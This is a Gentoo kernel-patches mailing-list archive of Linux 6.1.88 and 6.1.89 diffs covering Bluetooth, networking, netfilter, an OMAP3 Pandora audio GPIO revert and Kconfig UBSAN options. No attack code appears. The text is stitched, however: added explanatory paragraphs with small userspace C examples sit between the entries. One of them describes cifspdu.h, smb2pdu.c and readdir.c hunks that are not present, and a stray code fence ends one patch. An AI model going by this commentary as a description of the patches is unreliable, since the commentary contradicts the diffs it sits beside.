++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, add_uuid_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0) {
+ 		mgmt_pending_free(cmd);
+ 		goto failed;
+@@ -2774,8 +2778,11 @@ static int remove_uuid(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, remove_uuid_sync, cmd,
+-				 mgmt_class_complete);
++	/* MGMT_OP_REMOVE_UUID don't require adapter the UP/Running so use
++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, remove_uuid_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0)
+ 		mgmt_pending_free(cmd);
+ 
+@@ -2841,8 +2848,11 @@ static int set_dev_class(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, set_class_sync, cmd,
+-				 mgmt_class_complete);
++	/* MGMT_OP_SET_DEV_CLASS don't require adapter the UP/Running so use
++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, set_class_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0)
+ 		mgmt_pending_free(cmd);
+ 
+@@ -5530,8 +5540,8 @@ static int remove_adv_monitor(struct sock *sk, struct hci_dev *hdev,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, mgmt_remove_adv_monitor_sync, cmd,
+-				 mgmt_remove_adv_monitor_complete);
++	err = hci_cmd_sync_submit(hdev, mgmt_remove_adv_monitor_sync, cmd,
++				  mgmt_remove_adv_monitor_complete);
+ 
+ 	if (err) {
+ 		mgmt_pending_remove(cmd);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 2e9137c539a49..4a6bf60f3e7aa 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -971,7 +971,8 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct sco_options opts;
+ 	struct sco_conninfo cinfo;
+-	int len, err = 0;
++	int err = 0;
++	size_t len;
+ 
+ 	BT_DBG("sk %p", sk);
+ 
+@@ -993,7 +994,7 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 
+ 		BT_DBG("mtu %u", opts.mtu);
+ 
+-		len = min_t(unsigned int, len, sizeof(opts));
++		len = min(len, sizeof(opts));
+ 		if (copy_to_user(optval, (char *)&opts, len))
+ 			err = -EFAULT;
+ 
+@@ -1011,7 +1012,7 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 		cinfo.hci_handle = sco_pi(sk)->conn->hcon->handle;
+ 		memcpy(cinfo.dev_class, sco_pi(sk)->conn->hcon->dev_class, 3);
+ 
+-		len = min_t(unsigned int, len, sizeof(cinfo));
++		len = min(len, sizeof(cinfo));
+ 		if (copy_to_user(optval, (char *)&cinfo, len))
+ 			err = -EFAULT;
+ 
+diff --git a/net/bridge/br_netlink.c b/net/bridge/br_netlink.c
+index d087fd4c784ac..d38eff27767dc 100644
+--- a/net/bridge/br_netlink.c
++++ b/net/bridge/br_netlink.c
+@@ -650,7 +650,7 @@ void br_ifinfo_notify(int event, const struct net_bridge *br,
+ {
+ 	u32 filter = RTEXT_FILTER_BRVLAN_COMPRESSED;
+ 
+-	return br_info_notify(event, br, port, filter);
++	br_info_notify(event, br, port, filter);
+ }
+ 
+ /*
+diff --git a/net/core/sock.c b/net/core/sock.c
+index c8803b95ea0da..550af616f5359 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -279,6 +279,7 @@ __u32 sysctl_rmem_max __read_mostly = SK_RMEM_MAX;
+ EXPORT_SYMBOL(sysctl_rmem_max);
+ __u32 sysctl_wmem_default __read_mostly = SK_WMEM_MAX;
+ __u32 sysctl_rmem_default __read_mostly = SK_RMEM_MAX;
++int sysctl_mem_pcpu_rsv __read_mostly = SK_MEMORY_PCPU_RESERVE;
+ 
+ /* Maximal space eaten by iovec or ancillary data plus some space */
+ int sysctl_optmem_max __read_mostly = sizeof(unsigned long)*(2*UIO_MAXIOV+512);
+diff --git a/net/core/sysctl_net_core.c b/net/core/sysctl_net_core.c
+index 5b1ce656baa1d..d281d5343ff4a 100644
+--- a/net/core/sysctl_net_core.c
++++ b/net/core/sysctl_net_core.c
+@@ -29,6 +29,7 @@ static int int_3600 = 3600;
+ static int min_sndbuf = SOCK_MIN_SNDBUF;
+ static int min_rcvbuf = SOCK_MIN_RCVBUF;
+ static int max_skb_frags = MAX_SKB_FRAGS;
++static int min_mem_pcpu_rsv = SK_MEMORY_PCPU_RESERVE;
+ 
+ static int net_msg_warn;	/* Unused, but still a sysctl */
+ 
+@@ -348,6 +349,14 @@ static struct ctl_table net_core_table[] = {
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_rcvbuf,
+ 	},
++	{
++		.procname	= "mem_pcpu_rsv",
++		.data		= &sysctl_mem_pcpu_rsv,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= &min_mem_pcpu_rsv,
++	},
+ 	{
+ 		.procname	= "dev_weight",
+ 		.data		= &weight_p,
+diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c
+index e02daa74e8334..5ba7b460cbf76 100644
+--- a/net/ethernet/eth.c
++++ b/net/ethernet/eth.c
+@@ -164,17 +164,7 @@ __be16 eth_type_trans(struct sk_buff *skb, struct net_device *dev)
+ 	eth = (struct ethhdr *)skb->data;
+ 	skb_pull_inline(skb, ETH_HLEN);
+ 
+-	if (unlikely(!ether_addr_equal_64bits(eth->h_dest,
+-					      dev->dev_addr))) {
+-		if (unlikely(is_multicast_ether_addr_64bits(eth->h_dest))) {
+-			if (ether_addr_equal_64bits(eth->h_dest, dev->broadcast))
+-				skb->pkt_type = PACKET_BROADCAST;
+-			else
+-				skb->pkt_type = PACKET_MULTICAST;
+-		} else {
+-			skb->pkt_type = PACKET_OTHERHOST;
+-		}
+-	}
++	eth_skb_pkt_type(skb, dev);
+ 
+ 	/*
+ 	 * Some variants of DSA tagging don't have an ethertype field
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index 2b09ef70752f9..31051b327e53c 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -92,6 +92,7 @@
+ #include <net/inet_common.h>
+ #include <net/ip_fib.h>
+ #include <net/l3mdev.h>
++#include <net/addrconf.h>
+ 
+ /*
+  *	Build xmit assembly blocks
+@@ -1029,6 +1030,8 @@ bool icmp_build_probe(struct sk_buff *skb, struct icmphdr *icmphdr)
+ 	struct icmp_ext_hdr *ext_hdr, _ext_hdr;
+ 	struct icmp_ext_echo_iio *iio, _iio;
+ 	struct net *net = dev_net(skb->dev);
++	struct inet6_dev *in6_dev;
++	struct in_device *in_dev;
+ 	struct net_device *dev;
+ 	char buff[IFNAMSIZ];
+ 	u16 ident_len;
+@@ -1112,10 +1115,15 @@ bool icmp_build_probe(struct sk_buff *skb, struct icmphdr *icmphdr)
+ 	/* Fill bits in reply message */
+ 	if (dev->flags & IFF_UP)
+ 		status |= ICMP_EXT_ECHOREPLY_ACTIVE;
+-	if (__in_dev_get_rcu(dev) && __in_dev_get_rcu(dev)->ifa_list)
++
++	in_dev = __in_dev_get_rcu(dev);
++	if (in_dev && rcu_access_pointer(in_dev->ifa_list))
+ 		status |= ICMP_EXT_ECHOREPLY_IPV4;
+-	if (!list_empty(&rcu_dereference(dev->ip6_ptr)->addr_list))
++
++	in6_dev = __in6_dev_get(dev);
++	if (in6_dev && !list_empty(&in6_dev->addr_list))
+ 		status |= ICMP_EXT_ECHOREPLY_IPV6;
++
+ 	dev_put(dev);
+ 	icmphdr->un.echo.sequence |= htons(status);
+ 	return true;
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index a0c687ff25987..6c0f1e347b855 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -2168,6 +2168,9 @@ int ip_route_use_hint(struct sk_buff *skb, __be32 daddr, __be32 saddr,
+ 	int err = -EINVAL;
+ 	u32 tag = 0;
+ 
++	if (!in_dev)
++		return -EINVAL;
++
+ 	if (ipv4_is_multicast(saddr) || ipv4_is_lbcast(saddr))
+ 		goto martian_source;
+ 
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 2a78c78186c37..39fae7581d350 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -1141,16 +1141,17 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	if (msg->msg_controllen) {
+ 		err = udp_cmsg_send(sk, msg, &ipc.gso_size);
+-		if (err > 0)
++		if (err > 0) {
+ 			err = ip_cmsg_send(sk, msg, &ipc,
+ 					   sk->sk_family == AF_INET6);
++			connected = 0;
++		}
+ 		if (unlikely(err < 0)) {
+ 			kfree(ipc.opt);
+ 			return err;
+ 		}
+ 		if (ipc.opt)
+ 			free = 1;
+-		connected = 0;
+ 	}
+ 	if (!ipc.opt) {
+ 		struct ip_options_rcu *inet_opt;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 1775e9b9b85ad..504ea27d08fb0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1493,9 +1493,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		ipc6.opt = opt;
+ 
+ 		err = udp_cmsg_send(sk, msg, &ipc6.gso_size);
+-		if (err > 0)
++		if (err > 0) {
+ 			err = ip6_datagram_send_ctl(sock_net(sk), sk, msg, fl6,
+ 						    &ipc6);
++			connected = false;
++		}
+ 		if (err < 0) {
+ 			fl6_sock_release(flowlabel);
+ 			return err;
+@@ -1507,7 +1509,6 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		}
+ 		if (!(opt->opt_nflen|opt->opt_flen))
+ 			opt = NULL;
+-		connected = false;
+ 	}
+ 	if (!opt) {
+ 		opt = txopt_get(np);
+diff --git a/net/netfilter/ipvs/ip_vs_proto_sctp.c b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+index a0921adc31a9f..1e689c7141271 100644
+--- a/net/netfilter/ipvs/ip_vs_proto_sctp.c
++++ b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+@@ -126,7 +126,8 @@ sctp_snat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	if (sctph->source != cp->vport || payload_csum ||
+ 	    skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		sctph->source = cp->vport;
+-		sctp_nat_csum(skb, sctph, sctphoff);
++		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+ 	}
+@@ -174,7 +175,8 @@ sctp_dnat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	    (skb->ip_summed == CHECKSUM_PARTIAL &&
+ 	     !(skb_dst(skb)->dev->features & NETIF_F_SCTP_CRC))) {
+ 		sctph->dest = cp->dport;
+-		sctp_nat_csum(skb, sctph, sctphoff);
++		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else if (skb->ip_summed != CHECKSUM_PARTIAL) {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+ 	}
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index 274b6f7e6bb57..d170758a1eb5d 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -338,7 +338,9 @@ static void nft_netdev_event(unsigned long event, struct net_device *dev,
+ 		return;
+ 
+ 	if (n > 1) {
+-		nf_unregister_net_hook(ctx->net, &found->ops);
++		if (!(ctx->chain->table->flags & NFT_TABLE_F_DORMANT))
++			nf_unregister_net_hook(ctx->net, &found->ops);
++
+ 		list_del_rcu(&found->list);
+ 		kfree_rcu(found, rcu);
+ 		return;
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index e4ba86b84b9b1..2302bae1e0128 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1920,9 +1920,9 @@ static void ovs_ct_limit_exit(struct net *net, struct ovs_net *ovs_net)
+ 	for (i = 0; i < CT_LIMIT_HASH_BUCKETS; ++i) {
+ 		struct hlist_head *head = &info->limits[i];
+ 		struct ovs_ct_limit *ct_limit;
++		struct hlist_node *next;
+ 
+-		hlist_for_each_entry_rcu(ct_limit, head, hlist_node,
+-					 lockdep_ovsl_is_held())
++		hlist_for_each_entry_safe(ct_limit, next, head, hlist_node)
+ 			kfree_rcu(ct_limit, rcu);
+ 	}
+ 	kfree(info->limits);
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 85c6f05c0fa3c..d2fc795394a52 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -260,7 +260,7 @@ void unix_gc(void)
+ 			__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
+ 
+ 			if (sk->sk_state == TCP_LISTEN) {
+-				unix_state_lock(sk);
++				unix_state_lock_nested(sk, U_LOCK_GC_LISTENER);
+ 				unix_state_unlock(sk);
+ 			}
+ 		}
+diff --git a/rust/macros/lib.rs b/rust/macros/lib.rs
+index 91764bfb1f893..f2efa86a747a3 100644
+--- a/rust/macros/lib.rs
++++ b/rust/macros/lib.rs
+@@ -27,18 +27,6 @@
+ ///     author: b"Rust for Linux Contributors",
+ ///     description: b"My very own kernel module!",
+ ///     license: b"GPL",
+-///     params: {
+-///        my_i32: i32 {
+-///            default: 42,
+-///            permissions: 0o000,
+-///            description: b"Example of i32",
+-///        },
+-///        writeable_i32: i32 {
+-///            default: 42,
+-///            permissions: 0o644,
+-///            description: b"Example of i32",
+-///        },
+-///    },
+ /// }
+ ///
+ /// struct MyModule;


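A large share of the cifspdu.h hunks above convert legacy one-element arrays such as "char FileName[1]" into C99 flexible array members ("char FileName[]"). The one-element form makes sizeof() include a trailing byte, which is why the smb2pdu.c hunks can drop their "- 1" corrections and the readdir.c hunks add "+ 1" once the conversion lands; the flexible form also lets the compiler and the kernel's bounds-checking machinery see the real end of the fixed header. A minimal userspace sketch of the idiom (the struct and field names are illustrative, not taken from the patch):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative header-plus-payload struct: with a flexible array
 * member, sizeof(struct msg) covers only the fixed header, so no
 * phantom payload byte hides in the size. */
struct msg {
	unsigned int len;
	char data[];		/* flexible array member, must be last */
};

static struct msg *msg_alloc(const char *payload)
{
	size_t n = strlen(payload) + 1;
	struct msg *m = malloc(sizeof(*m) + n);	/* header + payload in one block */

	if (!m)
		return NULL;
	m->len = n;
	memcpy(m->data, payload, n);
	return m;
}

int main(void)
{
	struct msg *m = msg_alloc("hello");

	if (!m)
		return 1;
	printf("len=%u data=%s\n", m->len, m->data);
	free(m);
	return 0;
}
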
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-29 11:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-29 11:30 UTC (permalink / raw
  To: gentoo-commits

commit:     844998387fd9d7d10658d0eaaaaa4fb2d4afb787
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Apr 29 11:30:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Apr 29 11:30:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=84499838

Linux patch 6.1.89, this time for real

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1088_linux-6.1.89.patch | 168 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 168 insertions(+)

diff --git a/1088_linux-6.1.89.patch b/1088_linux-6.1.89.patch
new file mode 100644
index 00000000..4b4067bb
--- /dev/null
+++ b/1088_linux-6.1.89.patch
@@ -0,0 +1,168 @@
+diff --git a/Makefile b/Makefile
+index c73cb678fb9ac..a0472e1cf7156 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 88
++SUBLEVEL = 89
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-omap2/pdata-quirks.c b/arch/arm/mach-omap2/pdata-quirks.c
+index 44da1e14a3740..9deba798cc919 100644
+--- a/arch/arm/mach-omap2/pdata-quirks.c
++++ b/arch/arm/mach-omap2/pdata-quirks.c
+@@ -257,19 +257,9 @@ static struct platform_device pandora_backlight = {
+ 	.id	= -1,
+ };
+ 
+-static struct gpiod_lookup_table pandora_soc_audio_gpios = {
+-	.dev_id = "soc-audio",
+-	.table = {
+-		GPIO_LOOKUP("gpio-112-127", 6, "dac", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("gpio-0-15", 14, "amp", GPIO_ACTIVE_HIGH),
+-		{ }
+-	},
+-};
+-
+ static void __init omap3_pandora_legacy_init(void)
+ {
+ 	platform_device_register(&pandora_backlight);
+-	gpiod_add_lookup_table(&pandora_soc_audio_gpios);
+ }
+ #endif /* CONFIG_ARCH_OMAP3 */
+ 
+diff --git a/sound/soc/ti/omap3pandora.c b/sound/soc/ti/omap3pandora.c
+index fa92ed97dfe3b..a287e9747c2a1 100644
+--- a/sound/soc/ti/omap3pandora.c
++++ b/sound/soc/ti/omap3pandora.c
+@@ -7,7 +7,7 @@
+ 
+ #include <linux/clk.h>
+ #include <linux/platform_device.h>
+-#include <linux/gpio/consumer.h>
++#include <linux/gpio.h>
+ #include <linux/delay.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/module.h>
+@@ -21,11 +21,12 @@
+ 
+ #include "omap-mcbsp.h"
+ 
++#define OMAP3_PANDORA_DAC_POWER_GPIO	118
++#define OMAP3_PANDORA_AMP_POWER_GPIO	14
++
+ #define PREFIX "ASoC omap3pandora: "
+ 
+ static struct regulator *omap3pandora_dac_reg;
+-static struct gpio_desc *dac_power_gpio;
+-static struct gpio_desc *amp_power_gpio;
+ 
+ static int omap3pandora_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_pcm_hw_params *params)
+@@ -77,9 +78,9 @@ static int omap3pandora_dac_event(struct snd_soc_dapm_widget *w,
+ 			return ret;
+ 		}
+ 		mdelay(1);
+-		gpiod_set_value(dac_power_gpio, 1);
++		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 1);
+ 	} else {
+-		gpiod_set_value(dac_power_gpio, 0);
++		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
+ 		mdelay(1);
+ 		regulator_disable(omap3pandora_dac_reg);
+ 	}
+@@ -91,9 +92,9 @@ static int omap3pandora_hp_event(struct snd_soc_dapm_widget *w,
+ 	struct snd_kcontrol *k, int event)
+ {
+ 	if (SND_SOC_DAPM_EVENT_ON(event))
+-		gpiod_set_value(amp_power_gpio, 1);
++		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 1);
+ 	else
+-		gpiod_set_value(amp_power_gpio, 0);
++		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
+ 
+ 	return 0;
+ }
+@@ -228,10 +229,35 @@ static int __init omap3pandora_soc_init(void)
+ 
+ 	pr_info("OMAP3 Pandora SoC init\n");
+ 
++	ret = gpio_request(OMAP3_PANDORA_DAC_POWER_GPIO, "dac_power");
++	if (ret) {
++		pr_err(PREFIX "Failed to get DAC power GPIO\n");
++		return ret;
++	}
++
++	ret = gpio_direction_output(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
++	if (ret) {
++		pr_err(PREFIX "Failed to set DAC power GPIO direction\n");
++		goto fail0;
++	}
++
++	ret = gpio_request(OMAP3_PANDORA_AMP_POWER_GPIO, "amp_power");
++	if (ret) {
++		pr_err(PREFIX "Failed to get amp power GPIO\n");
++		goto fail0;
++	}
++
++	ret = gpio_direction_output(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
++	if (ret) {
++		pr_err(PREFIX "Failed to set amp power GPIO direction\n");
++		goto fail1;
++	}
++
+ 	omap3pandora_snd_device = platform_device_alloc("soc-audio", -1);
+ 	if (omap3pandora_snd_device == NULL) {
+ 		pr_err(PREFIX "Platform device allocation failed\n");
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto fail1;
+ 	}
+ 
+ 	platform_set_drvdata(omap3pandora_snd_device, &snd_soc_card_omap3pandora);
+@@ -242,20 +268,6 @@ static int __init omap3pandora_soc_init(void)
+ 		goto fail2;
+ 	}
+ 
+-	dac_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
+-					"dac", GPIOD_OUT_LOW);
+-	if (IS_ERR(dac_power_gpio)) {
+-		ret = PTR_ERR(dac_power_gpio);
+-		goto fail3;
+-	}
+-
+-	amp_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
+-					"amp", GPIOD_OUT_LOW);
+-	if (IS_ERR(amp_power_gpio)) {
+-		ret = PTR_ERR(amp_power_gpio);
+-		goto fail3;
+-	}
+-
+ 	omap3pandora_dac_reg = regulator_get(&omap3pandora_snd_device->dev, "vcc");
+ 	if (IS_ERR(omap3pandora_dac_reg)) {
+ 		pr_err(PREFIX "Failed to get DAC regulator from %s: %ld\n",
+@@ -271,7 +283,10 @@ static int __init omap3pandora_soc_init(void)
+ 	platform_device_del(omap3pandora_snd_device);
+ fail2:
+ 	platform_device_put(omap3pandora_snd_device);
+-
++fail1:
++	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
++fail0:
++	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ 	return ret;
+ }
+ module_init(omap3pandora_soc_init);
+@@ -280,6 +295,8 @@ static void __exit omap3pandora_soc_exit(void)
+ {
+ 	regulator_put(omap3pandora_dac_reg);
+ 	platform_device_unregister(omap3pandora_snd_device);
++	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
++	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ }
+ module_exit(omap3pandora_soc_exit);
+ 


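The restored omap3pandora_soc_init() above uses the kernel's conventional goto-based unwind: each acquired resource gains a matching cleanup label (fail0, fail1, fail2), and an error jumps to the label that releases exactly what has been acquired so far, in reverse order. A standalone sketch of that convention with made-up resource names (an illustration of the pattern, not code from the driver):

#include <stdio.h>
#include <stdlib.h>

/* Illustrative stand-ins for resource acquire/release. */
static int *acquire(const char *name)
{
	printf("acquire %s\n", name);
	return malloc(sizeof(int));
}

static void release(int *res, const char *name)
{
	printf("release %s\n", name);
	free(res);
}

static int demo_init(void)
{
	int *dac, *amp, *card;

	dac = acquire("dac_gpio");
	if (!dac)
		return -1;

	amp = acquire("amp_gpio");
	if (!amp)
		goto fail_dac;

	card = acquire("sound_card");
	if (!card)
		goto fail_amp;

	/* Success: all three resources stay held for later teardown. */
	return 0;

fail_amp:	/* unwind strictly in reverse acquisition order */
	release(amp, "amp_gpio");
fail_dac:
	release(dac, "dac_gpio");
	return -1;
}

int main(void)
{
	return demo_init() ? 1 : 0;
}
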
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-29 11:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-29 11:27 UTC (permalink / raw
  To: gentoo-commits

commit:     953980257fd3f8126add5807fc245277a419b080
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Apr 29 11:27:00 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Apr 29 11:27:00 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=95398025

Linux patch 6.1.89

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/0000_README b/0000_README
index 54940ade..d6fe6f2d 100644
--- a/0000_README
+++ b/0000_README
@@ -395,6 +395,10 @@ Patch:  1087_linux-6.1.88.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.88
 
+Patch:  1088_linux-6.1.89.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.89
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-27 22:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-27 22:45 UTC (permalink / raw
  To: gentoo-commits

commit:     47c1a6be7342f74fc0212885099153b2b2f014b8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 27 22:44:45 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 27 22:44:45 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=47c1a6be

Add UBSAN_BOUNDS and UBSAN_SHIFT and dependencies

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 195c7d47..4dcd85ca 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -6,9 +6,9 @@
  source "Documentation/Kconfig"
 +
 +source "distro/Kconfig"
---- /dev/null	2022-08-25 07:13:06.694086407 -0400
-+++ b/distro/Kconfig	2022-08-25 13:21:55.150660724 -0400
-@@ -0,0 +1,291 @@
+--- /dev/null	2024-04-27 13:10:54.188000027 -0400
++++ b/distro/Kconfig	2024-04-27 18:16:00.549054795 -0400
+@@ -0,0 +1,295 @@
 +menu "Gentoo Linux"
 +
 +config GENTOO_LINUX
@@ -213,6 +213,10 @@
 +	select SLAB_FREELIST_HARDENED
 +	select SHUFFLE_PAGE_ALLOCATOR
 +	select SLUB_DEBUG
++	select UBSAN
++	select CC_HAS_UBSAN_BOUNDS_STRICT if !CC_HAS_UBSAN_ARRAY_BOUNDS
++	select UBSAN_BOUNDS
++	select UBSAN_SHIFT
 +	select PAGE_POISONING
 +	select PAGE_POISONING_NO_SANITY
 +	select PAGE_POISONING_ZERO
@@ -300,7 +304,6 @@
 +		See the settings that become available for more details and fine-tuning.
 +
 +endmenu
-diff --git a/security/selinux/Kconfig b/security/selinux/Kconfig
 index 9e921fc72..f29bc13fa 100644
 --- a/security/selinux/Kconfig
 +++ b/security/selinux/Kconfig
@@ -339,4 +342,3 @@ index 24c045b24..e13fc740c 100644
  	  This is the portion of low virtual memory which should be protected
 -- 
 2.31.1
-```


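The UBSAN_BOUNDS and UBSAN_SHIFT selects above enable the compiler's bounds and shift sanitizers (-fsanitize=bounds / -fsanitize=shift, or the array-bounds variant on some compilers) across the kernel, so out-of-range array indexing and undefined shifts are reported at runtime instead of silently corrupting memory. A userspace analogue of what the instrumentation catches, with contrived values; build it with gcc -fsanitize=bounds,shift:

#include <stdio.h>

int main(void)
{
	int a[4] = { 1, 2, 3, 4 };
	volatile int i = 4;	/* volatile keeps the compiler from folding the index */

	/* With -fsanitize=bounds this reports an out-of-bounds read,
	 * e.g. "index 4 out of bounds for type 'int [4]'". */
	printf("%d\n", a[i]);

	/* With -fsanitize=shift this reports an invalid shift:
	 * a shift exponent of 32 is too large for a 32-bit int. */
	printf("%d\n", 1 << (i * 8));

	return 0;
}
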
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-27 17:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-27 17:06 UTC (permalink / raw
  To: gentoo-commits

commit:     04c7abfee3e9cb01a7248fcd438c73efb579e8d8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 27 17:06:11 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 27 17:06:11 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=04c7abfe

Linux patch 6.1.88

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1087_linux-6.1.88.patch | 16400 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 16404 insertions(+)

diff --git a/0000_README b/0000_README
index b5d4486e..54940ade 100644
--- a/0000_README
+++ b/0000_README
@@ -391,6 +391,10 @@ Patch:  1086_linux-6.1.87.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.87
 
+Patch:  1087_linux-6.1.88.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.88
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1087_linux-6.1.88.patch b/1087_linux-6.1.88.patch
new file mode 100644
index 00000000..a680e8c6
--- /dev/null
+++ b/1087_linux-6.1.88.patch
@@ -0,0 +1,16400 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index aebbe2981241a..e6f0570cf4900 100644
